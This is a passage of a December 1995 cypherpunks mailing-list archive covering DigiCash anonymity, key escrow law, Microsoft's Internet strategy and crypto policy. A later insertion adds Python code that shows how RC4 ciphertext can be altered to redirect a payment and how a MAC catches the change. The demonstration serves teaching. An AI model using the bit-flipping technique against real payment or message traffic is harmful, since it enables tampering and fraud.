might have been turned down.  

speaking only for myself...



Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Thu, 7 Dec 95 13:30:17 PST
To: Aleph One <aleph1@dfw.net>
Subject: Re: [NOISE] Re: FW: websurfer 4.6
In-Reply-To: <Pine.SUN.3.91.951207144508.21791A-100000@dfw.net>
Message-ID: <Pine.ULT.3.91.951207131535.13367F-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Dec 1995, Aleph One wrote:

> On Thu, 7 Dec 1995, Rich Graves wrote:
> > 
> > It may interest you to know that Microsoft recently licensed a bunch of 
> > stuff from NetManage (San Jose Merc, no real details given).
> 
> Another interesting tidbit is that the code for Microsoft Internet
> Explorer is licensed from Spry which has licensed Java from Sun so
> theoretically Microsoft will get Java for free (so to speak). Now the question
> is whether they will be stupid enough to strip it out of their product
> because they want to push VB.

And the answer, if you believe what they say, is in a series of 
PowerPoint presentations and speech transcripts on Microsoft's Web
server.

  http://www.microsoft.com/internet/

I found Bill Gates' presentation rather amusing because he uses the term
"broadband" to mean "high bandwidth." He seems to have gotten confused
because ATM is supposed to be both. 

The bit on server tools says Microsoft plans to do everything. Doesn't 
look like they've really decided on anything.

Microsoft Internet Explorer will become the browser choice for everyone.

Microsoft Network will ensure that its content is fully accessible to any 
browser.

Microsoft's strategy is to support VB.

Microsoft's strategy is to support Java.

Microsoft's strategy is to support Blackbird.

Microsoft's strategy is to support HTML and VRML.

Microsoft supports Internet and Windows Standards (the latter are not 
defined).

The pictures were pretty, though, especially in the Maritz piece. (Which
was actually prepared by Bill Conte... how convenient that MS Office 
saves the author's name and other summary information by default.)

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 7 Dec 95 14:05:32 PST
To: Hal <hfinney@shell.portal.com>
Subject: Re: Still more on the Digicash protocol
Message-ID: <m0tNnxi-00090NC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:03 AM 12/7/95 -0800, you wrote:

>I am glad that DigiCash supports this type of cash which anyone can
>deposit.  Actually, I am surprised and puzzled that it does, given
>Chaum's apparent reluctance to endorse schemes to allow payee anonymity
>(due to political problems, apparently). 


I, on the other hand, think one of the best uses of digital cash is to
drastically reduce and eventually eliminate the whole concept of
"government."   I see payee-anonymous digital cash as being absolutely
essential.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Thu, 7 Dec 95 05:08:10 PST
To: cypherpunks@toad.com
Subject: 1)Age etc CA 2)Swedish Digicash
In-Reply-To: <aceb57071f0210045a46@[205.199.118.202]>
Message-ID: <Pine.HPP.3.91.951207130643.29281A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 6 Dec 1995, Timothy C. May wrote:

> For example, Sameer's c2.org could issue accounts to people who can prove
> they are over 18 (notarized copies of birth certif., passport, etc.).
> Sameer's system would then have a credential saying "this account name is
> over 18."

Isn't it in the coming that a federal agency, such as the Post Office,
will become the primary issuer of age-including 'physical identity'
certificates, based on such notarized copies? And store signed public
keys for everybody? It certainly is here, and the Swedish Post Office
(=Posten, with PostNet) wants to do it all. Perhaps this is tolerable,
with the condition that only the 'identity' has access to the private
key. Posten has yet not come out in public with any details of their
proposed system, such as key-pair generation.

Also, I can read in today's paper (in an article flanked by a picture
of David Chaum, and mentioning Mark Twain - not by name but as
'an American bank') that EU has given one of three 'IT prizes'
to Digicash and that Posten has licensed Digicash and plans to
open a mint/bank (Posten already is closely connected to a bank)
dealing in Swedish crowns. (This is not news but things seem to
be moving right now.) Some (but slight) mention of laundering,
of course. It's supposed to come about in 'the beginning of next
year'. I wonder how exchanges crowns/dollars will be managed.
Perhaps one will have to do it oneself for some time. If Posten
doesn't want to deal with it - at least for a start - I'm sure
Mark Twain will exchange crowns to dollars for a fee, if only
Posten's system will be compatible. Lots of questions still
in limbo, though.

Mats





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu>
Date: Thu, 7 Dec 95 11:28:38 PST
To: jk@digit.ee
Subject: Re: 1)Age etc CA 2)Swedish Digicash
Message-ID: <01HYJ23QG1E29S3S5K@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"jk@digit.ee"  "Jyri Kaljundi"  7-DEC-1995 12:45:37.27

What about Estonia :) The taxes are low, there are a very few government 
regulations, the currency is very stable (based on German mark) ... One 
interesting law in Estonia is that the state budget must be balanced, so 
there is no way for the government to spend more money than it really has.

Technological level here is also quite good, and Internet is more popular
than in any other Eastern Europe or ex-USSR country. 

I think Estonia is an ideal place for such projects: high-tech companies 
testing their new technological ideas, inventions and business 
assumptions in real-life conditions. Just get yourself here !
--------
	The various Eastern European countries have been targeted before as
banking secrecy (read tax haven in the Feds' opinion) countries. Some others
might include Malta, although the Catholic influence there may make
pornography-related ventures problematic. On the other hand, using Malta would
make the conspiracy theorists go nuts...
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Thu, 7 Dec 95 11:32:44 PST
To: cypherpunks@toad.com
Subject: Who Protects Us from the "Protectors?"
Message-ID: <199512071933.OAA12319@pipe8.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


               Who Protects Us from the "Protectors?" 
         The Case of Father Ritter from Covenant House 
        (and the Relevance to the Crypto/G.A.K. Debate) 
 
The issue of the need to "protect children" is used as a major 
attack on quality crypto. The "kiddie pornographers" are described 
as one of the "four horsemen" who will, we are told, hide behind 
the crypto. Yet a review of the character and activities 
(medically, psychotherapeutically, ethically) of the very child 
protectors shows a tendency for some to be involved in the very 
activities they are ostensibly opposing. Worse, the public 
reputations built not infrequently serve to shield the individuals 
against public investigation of their own sexual activities. 
 
Father Bruce Ritter, one founder of Covenant House, is an example. 
 
Covenant House was originally started in New York City and located 
in the 42nd St. Times Square "porn district." The announced 
purpose of the organization was to protect runaway youth, arriving 
in NYC at the nearby interstate bus station, from sexual and other 
predations by the Square's denizens. 
 
Ritter soon developed a national reputation as a leading child 
protector. He was, for example, appointed a member of the 
President's Commission on Pornography ("Meese Commission.") There 
was only one fly in the ointment: Fr. Ritter was sexually involved 
with the very youth he was "protecting." 
 
So Ritter's anti-sexual persona (no sex education, "just say 
'no'," anti-condom distribution, anti-birth control, anti- 
abortion, clerical celibacy, anti-porn) covered his sexual 
practices. Ritter's fundraising to protect the children raised 
money for his hotel rooms. 
 
Worse, his public persona served to protect him as charges of his 
sexual proclivities surfaced. Ritter's supporters in the "save the 
children" coalitions did not investigate Ritter. They attacked the 
youth bringing charges against their saint. Some critics were 
charged with being fronts for the Times Square porn industry. 
Others had their honesty and their sanity questioned. 
 
Only when additional charges from additional youth surfaced and 
journalists "followed the money" trail did the true story of 
Ritter's sexual proclivities and masquerade develop. 
 
Critics of quality crypto and the internet demand that supporters 
of these things answer questions about what the supporters are 
doing to fight the "kiddie porn" forces. We should ask them the 
same question(s) about their own movement. Equally we should 
demand answers to the question of what they are doing to expose 
forces -- like Ritter -- who use the "protect the children" 
industry as camouflage for the very predations the industry 
ostensibly exists to fight.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu>
Date: Thu, 7 Dec 95 11:40:52 PST
To: pete@loshin.com
Subject: Re: Inherent Insecurity of Internet Commerce! (was RE: SecretClearance)
Message-ID: <01HYJ2LA0XJS9S3S5K@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"pete@loshin.com"  "Pete Loshin"  7-DEC-1995 14:37:13.07

OK, I'll try again. First, as I recall, SECRET clearance 
is actually not very high: when I got it, I had to answer 
a bunch of questions (do you abuse illegal drugs? are 
you now or have you ever been a member of any 
organizations? have you ever been _arrested_ for anything?) 
----------------------
	I suspect I know what organizations they're interested in (CPUSA et
al), but did they ask about any specific organizations?
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Thu, 7 Dec 95 12:50:20 PST
To: Rich Graves <llurch@networking.stanford.edu>
Subject: [NOISE] Re: FW: websurfer 4.6
In-Reply-To: <199512072012.PAA21672@bb.hks.net>
Message-ID: <Pine.SUN.3.91.951207144508.21791A-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Dec 1995, Rich Graves wrote:

> On Thu, 7 Dec 1995, Anonymous wrote:
> 
> > Not surprising. They confuse random doodling with software, too.
> > 
> > The real problem with NetManage is a severe case of brain death.
> 
> My, thanks for your opinion.
> 
> It may interest you to know that Microsoft recently licensed a bunch of 
> stuff from NetManage (San Jose Merc, no real details given).
> 
> - -rich

Another interesting tidbit is that the code for Microsoft Internet
Explorer is licensed from Spry which has licensed Java from Sun so
theoretically Microsoft will get Java for free (so to speak). Now the question
is whether they will be stupid enough to strip it out of their product
because they want to push VB.

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Thu, 7 Dec 95 12:01:01 PST
To: cypherpunks@toad.com
Subject: Multiple questions
Message-ID: <199512072002.PAA64046@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello again cypherpunks:

[In order to conserve bandwidth, I am going to ask for 5 things at
once which have nothing to do with each-other in this post. Please
reply to me privately if it's at all possible. <liberty@gate.net> ]

1. I have searched the archives for the author/artist of the "Rose on
Random Bits" logo, and I have e-mailed many cypherpunks "old-timers"
with no luck. [The logo appears at the top of the archives, but I am
well aware that, as an anarchy, cypherpunks has no "official logo."]
I have seen a number of beautiful logos during this search, but no-
body has pointed me to the author of this particular logo. Any help
finding this person would be _much_ appreciated. TIA.

2. I keep hearing every once-in-a-while about PGP3.0 (coming "real-
soon-now") but there's nothing specific about what's delaying it. I
would urge the developers (whoever they are) to release version 3.0
*before* the upcoming US presidential election, and I am interested
in finding out more. TIA.

3. I have been asked by a Libertarian Party presidential candidate
for a proposed platform plank in favor of strong, private, non-"GAK"
encryption. [OK! I've stopped saying "FUCKED"!<g>] Of course, I want
the maximum cypherpunk input possible, so feel free to suggest. The
wording must *not* be too technical in nature and should (of course)
condemn ITAR. <spit!> It should explain the real meaning of "escrow"
and the "Newspeak" version in as few words as possible. TIA for any
help on this. I'll post my final version if there's enough interest.

4. Has anyone in France been prosecuted for civilly-disobeying their
anti-strong-crypto law by using PGP? What happened? Did the French
people just roll over? TIA for any pointers (in English, please).

5. [A comment] Assuming the "secret clearance" requirement, how fast
could an escrow agency be decertified if the "secret" person dies or
is fired or heads for Anguilla, etc.? [Of course, I would not give a
secret key to such a system, considering the effectiveness of simple
attacks like "the honey trap" (ask Mordechai Vanunu how this attack
works).]
JMR
- ----------------------------------------------------------------------
Regards, Jim Ray
http://www.shopmiami.com/prs/jimray
- -----------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35 (key on homepage & servers) <liberty@gate.net> 
PGP encrypted mail enjoyed, even if it's _not_ "important." IANAL
- -----------------------------------------------------------------------
Help Phil! email zldf@clark.net or http://www.netresponse.com/zldf
_______________________________________________________________________


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh.

iQCVAwUBMMdHO21lp8bpvW01AQEZDgP9Hw8Ymf2zHMY59+TUE6N8+v+WHSeAXsQk
Kg7j3Z5jWwPSZopVL2joXolW2t41vDbFEgr5eclweGJXHkLiJdnlPEwGhr+rtf/n
dqv/m/o99kBf92D7nCME3nzMxJ1c4eQcGwFBjBZRvysQZ6PU/s0sSo5xqd5g2Qku
icleREE+aVc=
=4NSh
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Thu, 7 Dec 95 12:13:00 PST
To: cypherpunks@toad.com
Subject: Re: FW: websurfer 4.6
Message-ID: <199512072012.PAA21672@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 7 Dec 1995, Anonymous wrote:

> Not surprising. They confuse random doodling with software, too.
> 
> The real problem with NetManage is a severe case of brain death.

My, thanks for your opinion.

It may interest you to know that Microsoft recently licensed a bunch of 
stuff from NetManage (San Jose Merc, no real details given).

- -rich
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMMdKlSoZzwIn1bdtAQGYYgF8CIf5Trt1E5YdMCna43irv5MeGgFnzSvP
KXQ0ZR22U9MqbFAbrTjVKUB4ojC30lwo
=+3ha
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam philipp <adam@rosa.com>
Date: Thu, 7 Dec 95 14:17:52 PST
To: cypherpunks@toad.com
Subject: Netscape stock on 12/7/95
Message-ID: <9512072217.AA16206@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


16% tumble today...

   ...is the word getting out?


--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\
|PGP key available on my home page|Unauthorized interception violates |
|  http://XXXXXXXXXXXXXXXXX/adam  |federal law (18 USC Section 2700 et|
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-|seq.). In any case, PGP encrypted  |
|SUB ROSA...                      |communications are preferred for   | 
|  (see home page for definition) |sensitive materials.               |
\-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 7 Dec 95 12:34:49 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Inherent Insecurity of Internet Commerce! (was RE: Secret
Message-ID: <199512072035.PAA04297@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


various people wrote:

> OK, I'll try again. First, as I recall, SECRET clearance 
> is actually not very high: when I got it, I had to answer 
> a bunch of questions (do you abuse illegal drugs? are 
> you now or have you ever been a member of any 
> organizations? have you ever been _arrested_ for anything?) 

[and]

> 	I suspect I know what organizations they're interested in (CPUSA et
> al), but did they ask about any specific organizations?

I think this discussion of background checks for clearances has gone
rather far astray of cypherpunks relevance, folks....

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 7 Dec 95 06:39:07 PST
To: cypherpunks@toad.com
Subject: Prayers Pay
Message-ID: <199512071440.PAA02476@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



   The raiders hit early this morning, banging the door about
   4 AM, me groggily peeking out, a subpoena wadded into my
   shirt, then the bastards barged in. My ex-wife holding
   back, grinning like shit, saying you're fucked this time
   Johnny wee-dick.

   The black suits took all of it, computers, backup disks and
   tapes, printers, scanners, plotters, fuck, even the
   phones and message box -- jeez, why those?

   Harassment, teaching you a lesson, Bess my shark phoned
   just now, they shut your business down, take weeks to
   rummage the equipment and data, give it back slowly, one
   at a time, no hurry, wanting you to ache in case they find
   nothing. Swift justice, she hisses, even if you're
   innocent, cause nobody really is, they want you to scream,
   use you to broadcast a scare.

   Fuckups are getting gutted all over that Net Playboytoy.
   Six others this week, Bess coughs on, dragging deep, it's
   gonna rain even heavier in Exon's maelstrom, sweet darling
   maryjesus, prayers pay.












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Thu, 7 Dec 95 13:50:49 PST
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: [NOISE] Re: FW: websurfer 4.6
In-Reply-To: <Pine.ULT.3.91.951207131535.13367F-100000@Networking.Stanford.EDU>
Message-ID: <Pine.SUN.3.91.951207154059.21791B-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Dec 1995, Rich Graves wrote:

[snip]
> Microsoft's strategy is to support VB.
[snip]
> -rich
> 

It's interesting to note that all the people that were raving mad about Java
seem to be quiet now that MS is proposing to use VB. At least Java was 
designed from the ground up with security in mind. But VB? Actual binary
DLL running around. Just as an example look at Oracle's new PowerBrowser.
They have what they call CSP (or client side processing) which are just that:
VB DLLs that you keep in your machine and if you don't have one d/l.
Now their docs say that once you download all it does is warn you
so you can authenticate it and scan it for viruses. This is not good.
Wanna bet how many people don't? And this is not like Netscape plug-ins.
Where Netscape's plug-ins are meant to handle major content types (like 
streaming video) and you would get them from a company that then you can sue,
CSP are meant to be used anywhere from plugin type apps down to Java type 
applets like a ticker tape (their example).

Also note that Oracle included BASIC as their client side scripting language.
By reading the web pages I saw that the scripts seem to have access
to the client's history, profile, et al. Anyone for a "Hack Oracle Content"?
I will d/l today and play with it, if I find my guess true who will give
me a t-shirt?

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@guaymas.CS.Berkeley.EDU (David A Wagner)
Date: Thu, 7 Dec 95 12:57:33 PST
To: cypherpunks@toad.com
Subject: Re: Still more on the Digicash protocol
Message-ID: <199512072056.PAA21957@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <Pine.3.89.9512071804.A21520-0100000@unicorn.com>,
Rev. Mark Grant <mark@unicorn.com> wrote:
> I think he means you shouldn't use a stream cipher like RC4 that XORs the
> plaintext with the generated keystream, since if you know part of the
> plaintext, you can XOR those bytes with (the id you want) XOR (the id
> being sent) and change the encrypted data so that the payment goes into
> your account and not theirs.

Right.

RC4 encryption doesn't provide message integrity.

And I should mention that block ciphers like DES in chaining modes
like CBC don't provide message integrity either -- it's a bit harder,
but an active attacker can still tamper with the ciphertext to modify
the plaintext in a predictable way, like with RC4.

I admit it's more difficult to mount this attack against a block
cipher in chaining mode, and the success probability may go down
(depending on the circumstances), but hey! paranoia is your friend;
and my point remains valid:

	Don't count on encryption to give you message integrity.
	If you need message integrity, use a MAC.

If you want a citation for this basic crypto design principle, I'll
be happy to provide one.

>                              This is a tough, but potentially feasible
> attack if you use that kind of encryption scheme. 

Tough!?  It's trivial for an active attacker, in the stream cipher case.
He just xors some bits: no clever cryptanalysis needed.  (Or did you mean
it's tough to mount an active attack?  I agree: that requires significant
knowledge or motivation.)

> Is there anywhere that you could use a similar attack on SSL ?

Not in SSL v3.0; it explicitly uses a (cryptographically strong) MAC
(message authentication code) on each message to prevent tampering
and modification.

Dave Wagner, speaking for himself,
but thankful for all those behind the scenes who are helping
to improve and open up Digicash communications.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMMdVCCoZzwIn1bdtAQHEvQF/c1wmuVWCpmMo+4jY0cNlrrKD/5vYb/st
xC2dFLgb1ydJm6kfWRw0Hz8vF55tzj9t
=N+Gr
-----END PGP SIGNATURE-----
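
The point made in the message above, as an added example that is not part of the original post: encryption with an XOR keystream (alleged RC4) lets ciphertext be altered predictably without the key, and a MAC over the ciphertext rejects the altered message. The record layout, keys and helper names are constructed for illustration, and HMAC-SHA256 stands in for whatever MAC a real protocol specifies.

```python
import hashlib
import hmac

TAG_LEN = 32  # HMAC-SHA256 output size


def rc4(key: bytes, data: bytes) -> bytes:
    """Alleged RC4: XOR data with the keystream (one call encrypts or decrypts)."""
    state = list(range(256))
    j = 0
    for i in range(256):  # key scheduling
        j = (j + state[i] + key[i % len(key)]) & 0xFF
        state[i], state[j] = state[j], state[i]
    i = j = 0
    out = bytearray()
    for byte in data:  # keystream generation and XOR
        i = (i + 1) & 0xFF
        j = (j + state[i]) & 0xFF
        state[i], state[j] = state[j], state[i]
        out.append(byte ^ state[(state[i] + state[j]) & 0xFF])
    return bytes(out)


def xor_patch(ciphertext: bytes, offset: int, known: bytes, wanted: bytes) -> bytes:
    """Model the in-transit change the message describes.

    XORing (known XOR wanted) into the ciphertext makes those bytes decrypt
    to `wanted`. No key is involved, which is why encryption alone gives
    no integrity.
    """
    if len(known) != len(wanted):
        raise ValueError("replacement must have the same length")
    patched = bytearray(ciphertext)
    for k, (a, b) in enumerate(zip(known, wanted)):
        patched[offset + k] ^= a ^ b
    return bytes(patched)


def seal(enc_key: bytes, mac_key: bytes, plaintext: bytes) -> bytes:
    """Encrypt, then MAC the ciphertext with an independent key."""
    ciphertext = rc4(enc_key, plaintext)
    tag = hmac.new(mac_key, ciphertext, hashlib.sha256).digest()
    return ciphertext + tag


def open_sealed(enc_key: bytes, mac_key: bytes, blob: bytes) -> bytes:
    """Verify the MAC before decrypting; refuse anything that was altered."""
    if len(blob) < TAG_LEN:
        raise ValueError("message too short to carry a MAC")
    ciphertext, tag = blob[:-TAG_LEN], blob[-TAG_LEN:]
    expected = hmac.new(mac_key, ciphertext, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("MAC check failed: message was modified in transit")
    return rc4(enc_key, ciphertext)


def demo():
    # Constructed keys and record; a real protocol also needs a fresh key or
    # nonce per message, which this sketch leaves out.
    enc_key = b"constructed-enc-key"
    mac_key = b"constructed-mac-key"
    record = b"PAY 0100 TO ACCT=11112222"
    offset = record.index(b"11112222")

    # Encryption only: the receiver decrypts the altered record without complaint.
    altered = xor_patch(rc4(enc_key, record), offset, b"11112222", b"99990000")
    accepted_without_mac = rc4(enc_key, altered)

    # Encrypt-then-MAC: the same alteration is detected and rejected.
    altered_blob = xor_patch(seal(enc_key, mac_key, record), offset,
                             b"11112222", b"99990000")
    try:
        open_sealed(enc_key, mac_key, altered_blob)
        rejected_with_mac = False
    except ValueError:
        rejected_with_mac = True
    return accepted_without_mac, rejected_with_mac


if __name__ == "__main__":
    print(demo())
```
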




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Thu, 7 Dec 95 15:59:41 PST
To: cypherpunks@toad.com
Subject: More FUD from First Virtual
Message-ID: <v02120d01aced1ca6830e@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



It is important to remember that Nat Borenstein is a principal
in a company that very much does not want to see anonymous e-cash
succeed. Their extremely backwards technology cannot compete in
the long term with cryptography-based methods, and therefore they
are compelled to run around the country and on the Internet, bad-
mouthing cryptography and anonymity at every turn, while pointing
to some charity work for Phil Z. as a fig leaf to cover their
actions in this regard (sort of like Exxon building an artificial
reef and claiming to be friends of the environment.)

I have, on several occasions, refuted his "infinite liability" rant,
but it keeps on resurfacing. A few months ago, I wrote a short tech
note on why this claim doesn't hold water. I thought I might stretch
it into something longer, but other things have more urgently
grabbed my attention. It's available at:

http://www.communities.com/foo/noninf.txt

Also, I haven't had time to confirm it, but based on conversations with
and hints from Digicash people online, I'm pretty sure they are doing
something similar to this (possibly better) that they are hoping to
patent.

--doug







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cme@acm.org
Date: Thu, 7 Dec 95 13:28:43 PST
To: unicorn@polaris.mindport.net
Subject: Is there a lawyer in the house?
In-Reply-To: <199512071807.KAA07498@comsec.com>
Message-ID: <9512072127.AA28756@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Sat, 2 Dec 1995 03:39:00 -0500 (EST)
>From: Black Unicorn <unicorn@polaris.mindport.net>
>Subject: Re: Netscape gives in to key escrow

>An individual has no legitimate expectation of privacy in the encryption 
>numbers in his GAK browser, we reasoned, because he voluntarily conveyed 
>those numbers to the government when he purchased the software.

It could be even worse.  I was on a panel last year with Scott Charney (sp?)
(I believe from DoJ) during which he commented that if you give your secret
key to anyone -- e.g., your own company -- then you have given up the
presumption of privacy.  That leaves the police open to get that secret
without a warrant.  This claim should be checked by a real lawyer.

+--------------------------------------------------------------------------+
|Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme		   |
|PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
|  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
+---------------------------------------------- Jean Ellison (aka Mother) -+


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMMdbP1QXJENzYr45AQF64QP/dXHnfLuh6FFwCY2GxKNYC5lHlj/hcFmy
KqwWLYVqyr5vf/ZFEA6wlnVRMAARnenfCDmu7XQ9v9YzRjVrpjQMQAFrl9qlBivB
5wFGYSLME9sVtKIIPR0YSV8Xbw613bLmEnKiGrXxPNQ/bkaO30WOxG3N9Oen9DX4
sFfVbA+Ek0c=
=CEEO
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 7 Dec 95 15:11:28 PST
To: cypherpunks@toad.com
Subject: Re: Is there a lawyer in the house?
Message-ID: <acecb41c02021004f4ed@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:27 PM 12/7/95, cme@acm.org wrote:

>It could be even worse.  I was on a panel last year with Scott Charney (sp?)
>(I believe from DoJ) during which he commented that if you give your secret
>key to anyone -- e.g., your own company -- then you have given up the
>presumption of privacy.  That leaves the police open to get that secret
>without a warrant.  This claim should be checked by a real lawyer.

Huh?

You mean if you give me your key the police can get it from me without a
warrant? What if I don't want to give it up, and you don't? How would the
police get it without a warrant?

(And "I" could be your employer, so the point is clear.)

And even more strikingly, what if you give your private key to your lawyer
for safekeeping? Has attorney-client privilege gone away?

(Granted, there are ways to break attorney-client privilege, but these are
rare exceptions. In any case, the police could not get the private key
without a court order, warrant, whatever.)

I can believe that some cases of giving up keys wipe out one's arguments
based strictly on "privacy," but not that it wipes out other arguments.

It seems to me that if one wants to voluntarily escrow private keys, for
safekeeping, one's personal lawyer is a safe bet: it is very difficult to
break this kind of attorney-client confidentiality, from what I know of
such things.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Thu, 7 Dec 95 13:42:36 PST
To: rah@shipwright.com (Robert Hettinga)
Subject: Re: Geodesic Payment Systems? (was Re: Meeting notes from ANSI X.9 Meeting on Electronic Payment)
In-Reply-To: <v02120d30aceb5c57b23c@[199.0.65.105]>
Message-ID: <kklpxbOMc50e1DgT9u@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


[I'll respond to several people's comments on this thread all at once.]

Excerpts from mail.limbo: 6-Dec-95 Re: Geodesic Payment System.. Robert
Hettinga@shipwrig (6688*)

> >To be perfectly clear:  our minimum service charge is 30 cents, not 5
> >dollars.  If we didn't think it was worthwhile to take transactions that
> >small, we wouldn't do so.

> Fine. Are we including the cost of the credit card transaction to the
> consumer? Fees, interest, that stuff? There are lots of hidden costs in a
> book entry system. With a bearer-certificate system, the price is the
> spread between the certificate's bid and asked prices for (a traveller's
> check, for instance, is asked at a premium, and redeemed at face value, for
> instance. That's all the cost of using them.)

This includes *everything*.  The 29 cents plus 2% includes all
credit-card related fees.  

> That may be true, Nathaniel, but just because the people who bring the
> money off the net need to be identified to the digital cash underwriter's
> (actually the underwriter's bank's) satisfaction, doesn't mean that the
> trades on the net can't be totally anonymous. We've gone over this before.

Yes, this is absolutely true.  I didn't mean to imply otherwise.  The
question is whether or not the possibility of true anonymity in the net
transactions might widen the door for fraud on the conversion.  I think
that it does, in the sense that there's no good way to answer the
question, "is it reasonable for Robert Hettinga to be cashing in $2
million of ecash today?"  In a non-anonymous system, audit trails could
be called up automatically on any "suspiciously large" transaction, and
this would help to limit fraud (along with some other, less desirable
social consequences).  I'm not saying that this kind of accountability
would necessarily be a good thing, merely trying to explain why banks
are leery of true anonymity.

> So, given that model, what's the problem?

None at all, if you can find an underwriter who is comfortable with the
fact that his investigative options will be limited in the case of
suspiciously large or suspiciously frequent "cash out" events from a
given customer.  Apparently Mark Twain Bank finds that risk acceptable. 
I'm sure the larger banks will be watching quite closely.

Excerpts from mail.limbo: 6-Dec-95 Re: Geodesic Payment System.. Wei
Dai@eskimo.com (1462*)

> >..... There's a good reason that most
> > companies have "Ltd" after their name instead of "Unlimited", in those
> > countries where that's the naming convention.

> I find this argument totally unconvincing.  No risk is unbounded.  The 
> worst thing that can possibly happen is that a nearby star goes supernova 
> and completely destroys the earth.  Yet markets handle this 
> low-probability risk quite well.

